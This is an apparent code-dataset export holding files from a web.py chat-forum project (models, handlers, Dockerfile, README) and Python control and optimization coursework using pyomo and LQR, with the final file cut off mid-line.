db[cls.table].insert(model_dict)\n\n @classmethod\n def update(cls, **model_dict):\n query = {\"_id\": model_dict.pop('id')}\n return db[cls.table].update(query, model_dict)\n\n @classmethod\n def delete(cls, id):\n query = {\"_id\": id}\n db[cls.table].update(query, {'available': False})\n\n\nclass User(DBManage):\n id = None\n username = None\n password = None\n registed_time = None\n\n @classmethod\n def get_by_id(cls, id):\n obj = super(User, cls).get_by_id(id)\n obj.pop('password')\n obj.pop('registed_time')\n return obj\n\n @classmethod\n def get_by_username_password(cls, username, password):\n query = {\"username\": username, \"password\": password}\n user = [Storage(obj) for obj in db[cls.table].find(query)]\n try:\n obj = user[0]\n except IndexError:\n return None\n obj.pop('password')\n obj.pop('registed_time')\n return obj\n\n\nclass Topic(DBManage):\n id = None\n title = None\n created_time = None\n owner = None\n\n\nclass Message(DBManage):\n id = None\n content = None\n top_id = None\n user_id = None\n reply_to = None\n\n @classmethod\n def topic_count(cls, topic_id):\n query = {\n \"topic_id\": topic_id\n }\n return db[cls.table].find(query).count()\n\n @classmethod\n def get_latest_by_topic(cls, topic_id):\n query = {\n \"topic_id\": topic_id,\n }\n result = db[cls.table].find_one(query, sort=[(\"_id\", -1)])\n if result:\n return Storage(result)\n\n @classmethod\n def get_by_topic(cls, topic_id):\n query = {\n \"topic_id\": topic_id\n }\n return [obj for obj in db[cls.table].find(query)]\n\n @classmethod\n def create(cls, **model_dict):\n raw_content = model_dict.pop('content')\n # markdown处理\n content = markdown.markdown(raw_content, safe_mode=True)\n model_dict.update({\n 'content': content,\n 'raw_content': raw_content\n })\n return super(Message, cls).create(**model_dict)\n"
},
{
"alpha_fraction": 0.5332600474357605,
"alphanum_fraction": 0.5338097810745239,
"avg_line_length": 29.316667556762695,
"blob_id": "bfaadad0478ca75d28278b7b5a55f3f5199b2ba7",
"content_id": "10649204367c4ece94ea9eb99c63a317c229790d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1829,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 60,
"path": "/src/handlers/message.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nfrom datetime import datetime\n\nimport web\n\nfrom models import Message, User\nfrom .base import bad_request, display_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass MessageHandler:\n def GET(self):\n topic_id = web.input().get('topic_id')\n if topic_id:\n messages = Message.get_by_topic(topic_id) or []\n else:\n messages = Message.get_all()\n\n result = []\n current_user_id = session.user.id\n for m in messages:\n try:\n user = CACHE_USER[m.get('user_id')]\n except KeyError:\n user = User.get_by_id(m.get('user_id'))\n CACHE_USER[m.get('user_id')] = user\n message = dict(m)\n message['created_time'] = display_time(message['created_time'])\n message['user_name'] = user.username\n message['is_mine'] = (current_user_id == user.id)\n result.append(message)\n return json.dumps(result)\n\n def POST(self):\n data = web.data()\n data = json.loads(data)\n if not session.user or session.user.id is None:\n return bad_request(\"请先登录!\")\n\n message_data = {\n \"content\": data.get(\"content\"),\n \"topic_id\": data.get(\"topic_id\"),\n \"user_id\": session.user.id,\n \"created_time\": datetime.now(),\n }\n m_id = Message.create(**message_data)\n result = {\n \"id\": m_id,\n \"content\": message_data.get(\"content\"),\n \"topic_id\": message_data.get(\"topic_id\"),\n \"user_id\": session.user.id,\n \"user_name\": session.user.username,\n \"created_time\": display_time(message_data.get(\"created_time\")),\n \"is_mine\": True,\n }\n return json.dumps(result)\n"
},
{
"alpha_fraction": 0.6112499833106995,
"alphanum_fraction": 0.6349999904632568,
"avg_line_length": 21.22222137451172,
"blob_id": "898cb084e3b02e26a3f01e1e5cdd5081022a203d",
"content_id": "1eba618156e1fd636e95269be21df9e1f1b0aafa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 36,
"path": "/src/handlers/base.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nfrom datetime import datetime\n\nimport web\n\n\ndef bad_request(message):\n raise web.BadRequest(message=message)\n\n\ndef display_time(_datetime, format='%y-%m-%d %H:%M:%S'):\n return _datetime.strftime(format)\n\n\ndef pass_time(_datetime):\n duration = datetime.now() - _datetime\n if duration.days > 1:\n return \"%s天前\" % duration.days\n\n hours, minutes, seconds = convert_timedelta(duration)\n if hours > 0:\n return \"%s小时前\" % hours\n\n if minutes > 0:\n return \"%s分钟前\" % minutes\n\n if seconds > 0:\n return \"%s秒前\" % seconds\n\n\ndef convert_timedelta(duration):\n days, seconds = duration.days, duration.seconds\n hours = days * 24 + seconds // 3600\n minutes = (seconds % 3600) // 60\n seconds = (seconds % 60)\n return hours, minutes, seconds\n"
},
{
"alpha_fraction": 0.6873562932014465,
"alphanum_fraction": 0.7586206793785095,
"avg_line_length": 20.75,
"blob_id": "25c363872a7d0e317bddac58fc6ef1e102ed7e37",
"content_id": "9fb6ebdd040b8f610140262a7dd9a24473d3eb07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 20,
"path": "/Dockerfile",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "FROM centos:7\nMAINTAINER the5fire \"[email protected]\"\nENV REFRESHED_AT 2015-01-28\nENV PYTHONUNBUFFERED 1\n\nRUN rpm -iUvh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm\nRUN yum -y update\nRUN yum -y install gcc\nRUN yum -y install python-devel python-pip\n\nRUN mkdir /code\nWORKDIR /code\nADD ./ /code/\nRUN pip install -r /code/requirements.txt\nWORKDIR /code/src/\n\nEXPOSE 8001\nEXPOSE 10843\n\nCMD /code/src/bb_server.py 8001\n"
},
{
"alpha_fraction": 0.64673912525177,
"alphanum_fraction": 0.6521739363670349,
"avg_line_length": 14.333333015441895,
"blob_id": "91e5abc50f3375894eac80c1dc4286ac6984c983",
"content_id": "d4857071e0583b1e192f1d4f3d66c7465366ed81",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 12,
"path": "/src/handlers/index.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n\nimport web\n\nsession = web.config._session\n\n\n# 首页\nclass IndexHandler:\n def GET(self):\n render = web.template.render('templates/')\n return render.index()\n"
},
{
"alpha_fraction": 0.6379310488700867,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28,
"blob_id": "7fdb141c1f348b14f03054a2f1a00980d976956e",
"content_id": "6b3c2f49e7f2d00c2373732ad6c0dca6b7b21b95",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 58,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 2,
"path": "/src/run.sh",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nnohup python bb_server.py > access.log 2>&1 &\n"
},
{
"alpha_fraction": 0.5682961940765381,
"alphanum_fraction": 0.5686556696891785,
"avg_line_length": 26.544553756713867,
"blob_id": "71c573d1bce9c2b51a6126c4d8e480e7b3bd1656",
"content_id": "18dad9778749df1dab0f0ab7094989f308646bb9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2934,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 101,
"path": "/src/handlers/socket.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport copy\nfrom datetime import datetime\n\nimport web\nfrom socketio import socketio_manage\nfrom socketio.namespace import BaseNamespace\nfrom socketio.mixins import RoomsMixin, BroadcastMixin\nimport markdown\n\nfrom models import Message\nfrom .base import display_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass ChatNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):\n def on_go_out(self):\n room_num = self.socket.session.get('room')\n if room_num:\n print 'go_out', room_num\n self.leave(room_num)\n\n def on_index(self, username):\n user = self.environ['user']\n if user is None:\n user = {\"username\": username}\n if user not in self.request['online_users']:\n self.request['online_users'].append(user)\n self.broadcast_event('online_users', self.request['online_users'])\n\n def on_topic(self, topic_id):\n \"\"\" 加入以某个主题id为房间\n\n 客户端进入聊天室界面先发送此请求,确定房间号\n \"\"\"\n room_num = 'room_%s' % topic_id\n self.socket.session['room'] = room_num\n print 'join', room_num\n self.join(room_num)\n\n def on_message(self, model):\n user = self.environ['user']\n if user is None:\n # 手动从store中取出user\n session_id = self.environ['session_id']\n _data = session.store[session_id]\n user = _data['user']\n model.update({\n \"user_id\": user.id,\n \"created_time\": datetime.now(),\n })\n m_id = Message.create(**model)\n raw_content = model.get('content')\n model.update({\n \"content\": markdown.markdown(raw_content),\n \"raw_content\": raw_content,\n \"user_name\": user.username,\n 'id': m_id,\n 'created_time': display_time(model['created_time']),\n 'is_mine': True,\n })\n # 发送回客户端\n self.emit('message', model)\n\n # 发送给其他人\n model['is_mine'] = False\n self.emit_to_room(\n self.socket.session['room'],\n 'message',\n model,\n )\n\n def recv_disconnect(self):\n user = self.environ['user']\n try:\n self.request['online_users'].remove(user)\n except ValueError:\n # 忽略不存在用户的异常\n pass\n self.broadcast_event('online_users', self.request['online_users'])\n\n self.disconnect(silent=True)\n\nrequest = {\n 'online_users': []\n}\n\n\nclass SocketHandler:\n def GET(self):\n context = copy.copy(web.ctx.environ)\n context.update({\n \"user\": session.user,\n \"session_id\": session.session_id,\n })\n socketio_manage(context, {'': ChatNamespace}, request)\n # 重新载入session数据,因为session在socket请求中改变了\n session._load()\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 12.714285850524902,
"blob_id": "555ae8d7c4508ed981d74b82c98b8ac65d23b472",
"content_id": "5f77777a9a3acc3f879332d24b15717dc7e7e7aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "web.py\ngevent==1.0.1\ngevent-socketio==0.3.6\ngevent-websocket==0.9.3\nsupervisor\npymongo\nmarkdown\n"
},
{
"alpha_fraction": 0.6557930111885071,
"alphanum_fraction": 0.674915611743927,
"avg_line_length": 26.78125,
"blob_id": "c1045690d11477fcf548026a95e644f7d6aa7700",
"content_id": "763c3d4a18d9f4697878f0bb2edeee6294be71c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1277,
"license_type": "permissive",
"max_line_length": 198,
"num_lines": 32,
"path": "/README.rst",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "bb-js.org\n==================\n\n是从 `Backbonejs入门教程第二版 <https://github.com/the5fire/backbonejs-learning-note>`_ 中最终演化的 `Wechat <https://github.com/the5fire/wechat>`_ 项目fork出来的。打算搞一个Backbonejs的中文社区,开发者除了可以在里面交流技术,还是通过技术共同构建社区——实践技术。\n\n\n本地运行此项目\n-------------------------\n\n::\n\n git clone https://github.com/bb-js/bb-js.org\n cd bb-js.org && pip install -r requirements.txt\n cd src\n python init_sqlite.py\n python bb_server.py\n\n然后打开浏览器输入http://127.0.0.1:8080,就能看到了。\n\n\n如何贡献代码\n-------------------------\n\n1. fork一份到你的仓库中\n2. 从你的仓库clone到本地: ``git clone [email protected]:yourname/bb-js.org``\n3. 发现bug时: ``git checkout -b fix-<some>-bug`` ,修改完bug,push到github\n4. 然后在你fork的项目上就能看到一个pull-request的按钮,点它,之后安装提示操作。\n5. 更新你的仓库和官方一致。创建一个upstream(上游)的源: ``git remote add upstream https://github.com/bb-js/bb-js.org`` ::\n\n 用来更新官方代码到你的fork仓库中,通过该命令:\n git pull upstream master\n git merge upstream/master\n"
},
{
"alpha_fraction": 0.3072916567325592,
"alphanum_fraction": 0.40625,
"avg_line_length": 15,
"blob_id": "55259f4543479aee19468e5d23c399212c57d785",
"content_id": "70b1369db8ace3e614790d9858f718906166e11e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 12,
"path": "/CHANGELOG.rst",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "更新日志\n=========================\n\n2014-05-09已有功能\n-----------------------------------\n1. 登录注册\n2. 发表话题(标题,时间,创建人)\n3. 实时发布消息(内容,时间,创建人)\n\n2014-06-19\n------------------------\n在话题列表页显示每个话题的回复数和最新一条回复\n"
},
{
"alpha_fraction": 0.5526450872421265,
"alphanum_fraction": 0.5552131533622742,
"avg_line_length": 21.63953399658203,
"blob_id": "178d84f0759dc310ed33cfbbecfb0016f5aba9f3",
"content_id": "db3995798a791c24eb1dbf7845029a401c53ba92",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2017,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 86,
"path": "/src/handlers/user.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nimport hashlib\nimport sqlite3\nfrom datetime import datetime\n\nimport web\n\nfrom models import User\nfrom .base import bad_request\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\ndef sha1(data):\n return hashlib.sha1(data).hexdigest()\n\n\nclass UserHandler:\n def GET(self):\n # 获取当前登录的用户数据\n user = session.user\n return json.dumps(user)\n\n def POST(self):\n data = web.data()\n data = json.loads(data)\n username = data.get(\"username\")\n password = data.get(\"password\")\n password_repeat = data.get(\"password_repeat\")\n\n if password != password_repeat:\n return bad_request('两次密码输入不一致')\n\n user_data = {\n \"username\": username,\n \"password\": sha1(password),\n \"registed_time\": datetime.now(),\n }\n\n try:\n user_id = User.create(**user_data)\n except sqlite3.IntegrityError:\n return bad_request('用户名已存在!')\n\n user = User.get_by_id(user_id)\n session.login = True\n session.user = user\n\n result = {\n 'id': user_id,\n 'username': username,\n }\n return json.dumps(result)\n\n\nclass LoginHandler:\n def POST(self):\n data = web.data()\n data = json.loads(data)\n username = data.get(\"username\")\n password = data.get(\"password\")\n user = User.get_by_username_password(\n username=username,\n password=sha1(password)\n )\n if not user:\n return bad_request('用户名或密码错误!')\n\n session.login = True\n session.user = user\n result = {\n 'id': user.get('_id'),\n 'username': user.get('username'),\n }\n return json.dumps(result)\n\n\nclass LogoutHandler:\n def GET(self):\n session.login = False\n session.user = None\n session.kill()\n return web.tempredirect('/#login')\n"
}
] | 12 |
ZionDeng/Advanced-Control-Design
|
https://github.com/ZionDeng/Advanced-Control-Design
|
c471c44b3044b94e197147ec566811be8d1a5ffd
|
1e82cdd1b98e95a0d210808e89eff4536efc9e73
|
9d0d4db62ebc84460c7d6f53ac28cbe315407592
|
refs/heads/master
| 2023-01-29T07:50:21.805723 | 2020-12-09T15:48:56 | 2020-12-09T15:48:56 | 312,738,867 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 19.16666603088379,
"blob_id": "dd138ab13cf2693d1dc62aaafe0c1b75149e77f8",
"content_id": "06ee366e38a5f4a6c160577de5998ca1eb347020",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/py_files/test_midterm.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \n\ntest = np.arange(12).reshape((6,2))\n# print(test)\ntest_flatten = test.flatten()\nprint(test_flatten)"
},
{
"alpha_fraction": 0.592858612537384,
"alphanum_fraction": 0.634516716003418,
"avg_line_length": 27.005746841430664,
"blob_id": "fae0f7ded93b0681f6a289691b0ff70182c257c2",
"content_id": "67ae3a28d1fc99dbc92060b92eefe97906503a77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4873,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 174,
"path": "/py_files/Lab3_opt_pyomo.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# use Pyomo to solve optimization problems \n# linear, quadratic, nonlinear, mixed-integer \n\nimport pyomo.environ as pyo \n\n# %% linear programming \nmodel = pyo.ConcreteModel()\nmodel.x = pyo.Var()\nmodel.y = pyo.Var()\nmodel.z = pyo.Var()\n\nmodel.Obj = pyo.Objective(expr = model.x + model.y + model.z)\nmodel.cons1 = pyo.Constraint(expr = -2<= model.x)\nmodel.cons2 = pyo.Constraint(expr = -1<= model.y)\nmodel.cons3 = pyo.Constraint(expr = -3<= model.z)\nmodel.cons4 = pyo.Constraint(expr = model.x - model.y + model.z >= 4)\n\nsolver = pyo.SolverFactory('cbc')\nresult = solver.solve(model)\n\n# print('x*_solver = ',pyo.value(model.x))\n# print('y*_solver = ',pyo.value(model.y))\n# print('z*_solver = ',pyo.value(model.z))\n# print('opt_value = ',pyo.value(model.Obj))\n\n\n# %% nonlinear programming \nimport numpy as np \n\nmodel = pyo.ConcreteModel()\nmodel.z1 = pyo.Var()\nmodel.z2 = pyo.Var()\nmodel.Obj = pyo.Objective(expr = 3 * pyo.sin(-2*np.pi * model.z1) + 2* model.z1 + 4 + pyo.cos(2*np.pi*model.z2) + model.z2)\n\nmodel.cons1 = pyo.Constraint(expr = (-1,model.z1,1))\nmodel.cons2 = pyo.Constraint(expr = (-1,model.z2,1))\n# model.cons2 = pyo.Constraint(expr = -1<= model.z2 <= 1)\n\n\nresults = pyo.SolverFactory('ipopt').solve(model)\n\n# print('zOpt = ',[pyo.value(model.z1),pyo.value(model.z2)])\n# print('JOpt = ', pyo.value(model.Obj))\n\nz1 = []\nz2 = []\nJ = []\nfor _ in range(10):\n z1_init = np.random.uniform(low = -1.0,high = 1.0)\n z2_init = np.random.uniform(low=-1.0, high = 1.0)\n model = pyo.ConcreteModel()\n model.z1 = pyo.Var(initialize = z1_init)\n model.z2 = pyo.Var(initialize = z2_init)\n model.obj = pyo.Objective(expr =3*pyo.sin(-2*np.pi*model.z1) + 2*model.z1 + 4 + pyo.cos(2*np.pi*model.z2) + model.z2)\n model.cons1 = pyo.Constraint(expr = (-1,model.z1,1))\n model.cons2 = pyo.Constraint(expr = (-1,model.z2,1))\n\n results = pyo.SolverFactory('ipopt').solve(model)\n z1.append(pyo.value(model.z1))\n z2.append(pyo.value(model.z2))\n J.append(pyo.value(model.obj))\n\n# print('z1Opt = ',z1)\n\nimport matplotlib.pyplot as plt \n\nz1_opt = z1 \nz2_opt = z2 \nfig, ax = plt.subplots(figsize = (15,15))\nz = np.linspace(-1,1,100)\nz1,z2 = np.meshgrid(z,z)\nC = 3* np.sin(-2* np.pi * z1 ) + 2*z1 + 4+ np.cos(2* np.pi* z2) + z2\ncontour = ax.contour(z1,z2,C, cmap = plt.cm.RdBu, vmin = abs(C).min(), vmax = abs(C).max(),)\nax.clabel(contour,fontsize = 10, inline =1)\nax.axis('square')\nax.scatter(z1_opt,z2_opt,c='r',marker ='o')\n# plt.show()\n\n# %% mixed integer programming \n\n# power plant problem \n\n# Horizon = 48 \n# T = np.array([t for t in range(Horizon)])\nT = 48\n\n# predicted demand\nd = np.array([100 + 50 * np.sin(t * 2*np.pi/24) for t in range(T)])\n\nN = 3\n# N = np.array([n for n in range(Nplant)])\n\nPmax = [100,50,25]\nPmin = [20,40,1]\nC = [10,20,20] \n\nmodel = pyo.ConcreteModel()\nmodel.N = pyo.Set(initialize = range(N))\nmodel.T = pyo.Set(initialize = range(T)) \n\n# production\nmodel.x = pyo.Var(model.N, model.T)\n\n# on/off \nmodel.u = pyo.Var(model.N, model.T, domain= pyo.Binary)\n\n# cost function \nmodel.cost = pyo.Objective(\n expr = sum(model.x[n,t]* C[n] for t in model.T for n in model.N),\n sense = pyo.minimize \n)\n\n# demand constraints \nmodel.demand = pyo.Constraint(\n model.T, rule = lambda model,t: sum(model.x[n,t] for n in range(N)) >= d[t]\n)\n\n# production constraints still confusing ???\nmodel.lb = pyo.Constraint(\n model.N, model.T, rule = lambda\n model, n, t: Pmin[n] * model.u[n,t] <= model.x[n,t]\n)\n\n\nmodel.ub = pyo.Constraint(\n model.N, model.T, rule = lambda\n model,n,t: Pmax[n] * model.u[n,t] >= model.x[n,t]\n)\n\nresult = pyo.SolverFactory('glpk').solve(model) \n# ---------pay attention to the solver ------------\n\nunit1 = [pyo.value(model.x[0,0])]\nunit2 = [pyo.value(model.x[1,0])]\nunit3 = [pyo.value(model.x[2,0])]\n\nfor t in range(T):\n unit1.append(pyo.value(model.x[0,t]))\n unit2.append(pyo.value(model.x[1,t]))\n unit3.append(pyo.value(model.x[2,t]))\nplt.figure(figsize = (15,15))\nplt.step(unit1,'b')\nplt.step(unit2,'g')\nplt.step(unit3,'r')\n# plt.show()\n\n\n# %% Quadratic programming \n\nx0 = 10 \n\nmodel = pyo.ConcreteModel()\n\nmodel.idxx = pyo.Set(initialize = [0,1])\nmodel.idxu = pyo.Set(initialize = [0,1])\nmodel.x = pyo.Var(model.idxx)\nmodel.u = pyo.Var(model.idxu)\n\nmodel.obj = pyo.Objective(\n expr = 0.5* (model.x[0]**2 + model.x[1]**2 + model.u[0]**2 + model.u[1]**2),\n sense = pyo.minimize \n)\n\nmodel.cons1 = pyo.Constraint(expr = model.x[0] == 0.5*x0+ model.u[0])\nmodel.cons2 = pyo.Constraint(expr = model.x[1] == 0.5*model.x[0]+ model.u[1])\nmodel.cons3 = pyo.Constraint(expr = (2,model.x[0],5))\nmodel.cons4 = pyo.Constraint(expr = (-2,model.x[1],5))\nmodel.cons5 = pyo.Constraint(expr = (-1,model.u[0],1) )\nmodel.cons6 = pyo.Constraint(expr = (-1,model.u[1],1))\n\nresult = pyo.SolverFactory('ipopt').solve(model)\n\nprint('x* = ',[model.x[i]() for i in model.idxx])\nprint('opt_value = ', model.obj())\n"
},
{
"alpha_fraction": 0.5312907695770264,
"alphanum_fraction": 0.5704041719436646,
"avg_line_length": 20.30555534362793,
"blob_id": "d0651916e9d71b321a8a9e0d6eff90c253ba2fef",
"content_id": "f1e11bf2a05c9c5caa18939ebcd379464babc29a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1534,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 72,
"path": "/py_files/Lab6_LQR.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom scipy.integrate import solve_ivp\nimport numpy as np\nfrom scipy.linalg import inv\nfrom scipy import linalg\n\nimport scipy.signal\n# import scipy.linalg\n\nTs = .1\na0 = -2.5\na1 = .05\nb0 = .25\nAc = np.array([0, 1, -a0, -a1]).reshape((2, 2))\nBc = np.array([0, b0]).reshape((2, 1))\n\nCc = np.zeros((1, 2))\nDc = np.zeros((1, 1))\n\nAd, Bd, Cd, Dd, dt = scipy.signal.cont2discrete((Ac, Bc, Cc, Dc\n ), Ts)\n\nQ = np.diag([1, 0])\nR = 1\n\n\ndef dlqr(A, B, Q, R):\n P = scipy.linalg.solve_discrete_are(A, B, Q, R)\n K = inv(B.T @ P @ B + R) @ (B.T@P @ A)\n eigVals, eigVecs = linalg.eig(A - B @ K)\n return K, P, eigVals\n\n\nKlqr, P, eigvals = dlqr(Ad, Bd, Q, R)\n\n\nx0 = np.array([np.pi/4, 0])\nTf = 10\nT0 = 0\n\n\n# def continuous_dyn(t, x, u):\n# theta, theta_dot = x\n# return [theta_dot, -a0*np.sin(theta) - a1*theta_dot + b0*np.cos(theta)*u]\n\n\ndef continuous_dyn_with_controller(t, x, klqr):\n theta, theta_dot = x\n k1, k2 = klqr\n u = -k1 * theta - k2*theta_dot\n return [theta_dot, -a0 * np.sin(theta) - a1*theta_dot + b0*u*np.cos(theta)]\n\n\nsol = solve_ivp(\n continuous_dyn_with_controller, [T0, Tf], x0,\n t_eval=np.arange(0, Tf, Ts),\n args=(Klqr)\n # it is not flatten here!!----------\n)\nu = [-Klqr @ sol.y[:, i] for i in range(len(sol.y[0, :]))]\n\n\nplt.subplot(3, 1, 1)\nplt.plot(sol.y[0, :])\nplt.ylabel('theta')\nplt.subplot(312)\nplt.plot(sol.y[1, :])\nplt.ylabel('theta_dot')\nplt.subplot(313)\nplt.plot(u, 'r')\nplt.ylabel('u')\nplt.show()\n"
},
{
"alpha_fraction": 0.49100178480148315,
"alphanum_fraction": 0.5334054231643677,
"avg_line_length": 30.180723190307617,
"blob_id": "8acbf2b0ecea7e9a279c846f477a3c5b5bf3a3d2",
"content_id": "5ac9397375a2d27c82b5d06ce4f4d0c03d4eba8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12947,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 415,
"path": "/py_files/HW3_optimization2.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# Linear and quadratic programming \nimport pyomo.environ as pyo\nimport numpy as np\ndef check_solver_status(model, results):\n from pyomo.opt import SolverStatus, TerminationCondition\n if (results.solver.status == SolverStatus.ok) and (results.solver.termination_condition == TerminationCondition.optimal):\n print('========================================================================================')\n print('================ Problem is feasible and the optimal solution is found ==================')\n # print('z1 optimal=', pyo.value(model.z[1]))\n # print('z2 optimal=', pyo.value(model.z[2]))\n print('z1 optimal=', pyo.value(model.z1))\n print('z2 optimal=', pyo.value(model.z2)) \n print('optimal value=', pyo.value(model.obj))\n print('========================================================================================')\n bound = True\n feas = True\n # zOpt = np.array([pyo.value(model.z[1]), pyo.value(model.z[2])])\n zOpt = np.array([pyo.value(model.z1), pyo.value(model.z2)])\n\n JOpt = pyo.value(model.obj)\n elif (results.solver.termination_condition == TerminationCondition.infeasible):\n print('========================================================')\n print('================ Problem is infeasible ==================')\n print('========================================================')\n feas = False\n zOpt = []\n JOpt = []\n if (results.solver.termination_condition == TerminationCondition.unbounded):\n print('================ Problem is unbounded ==================')\n bound = False\n else:\n bound = True\n \n else:\n if (results.solver.termination_condition == TerminationCondition.unbounded):\n print('================ Problem is unbounded ==================')\n bound = False\n feas = True\n zOpt = []\n JOpt = np.inf\n else:\n bound = True\n feas = True\n zOpt = []\n JOpt = np.inf\n \n return feas, bound, zOpt, JOpt\n\ndef LPQPa():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = -5* m.z1-7* m.z2)\n m.cons1 = pyo.Constraint(expr = -3 * m.z1 + 2*m.z2 <= 30)\n m.cons2 = pyo.Constraint(expr = -2 * m.z1 + m.z2 <= 12)\n m.cons3 = pyo.Constraint(expr = m.z1 >=0)\n m.cons4 = pyo.Constraint(expr = m.z2 >=0)\n\n sol = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,sol)\n# print(LPQPa())\n\ndef LPQPb():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = 3*m.z1 + m.z2)\n\n m.cons1 = pyo.Constraint(expr = -1*m.z1 -1*m.z2 <=1)\n m.cons2 = pyo.Constraint(expr = 3*m.z1 + 2 *m.z2 <=12)\n m.cons3 = pyo.Constraint(expr = 2*m.z1 + 3*m.z2 <=3)\n m.cons4 = pyo.Constraint(expr = -2*m.z1 + 3*m.z2 >=9)\n m.cons5 = pyo.Constraint(expr = m.z1 >=0)\n m.cons6 = pyo.Constraint(expr = m.z2 >=0)\n\n res = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPb())\n\ndef LPQPc():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.t11 = pyo.Var()\n m.t12 = pyo.Var()\n m.tinf = pyo.Var()\n m.obj = pyo.Objective(expr = m.t11 + m.t12 + m.tinf)\n\n m.cons1 = pyo.Constraint(expr = 3*m.z1 + 2*m.z2 <= -3)\n m.cons2 = pyo.Constraint(expr = (0,m.z1,2))\n m.cons3 = pyo.Constraint(expr = (-2,m.z2,3))\n\n m.cons4 = pyo.Constraint(expr = m.tinf >= m.z1 -2)\n m.cons5 = pyo.Constraint(expr = m.tinf >= -(m.z1 -2))\n m.cons6 = pyo.Constraint(expr = m.tinf >= m.z2)\n m.cons7 = pyo.Constraint(expr = m.tinf >= -m.z2)\n\n m.cons8 = pyo.Constraint(expr = m.t11 >= m.z1)\n m.cons9 = pyo.Constraint(expr = m.t11 >= -m.z1)\n m.cons10 = pyo.Constraint(expr = m.t12 >= m.z2+5)\n m.cons11 = pyo.Constraint(expr = m.t12 >= -(m.z2+5))\n\n res = pyo.SolverFactory('cbc').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPc())\n\ndef LPQPd():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = m.z1**2 + m.z2**2)\n m.cons1 = pyo.Constraint(expr = m.z1 <= -3)\n m.cons2 = pyo.Constraint(expr = m.z2<= 4)\n m.cons3 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=0)\n\n res = 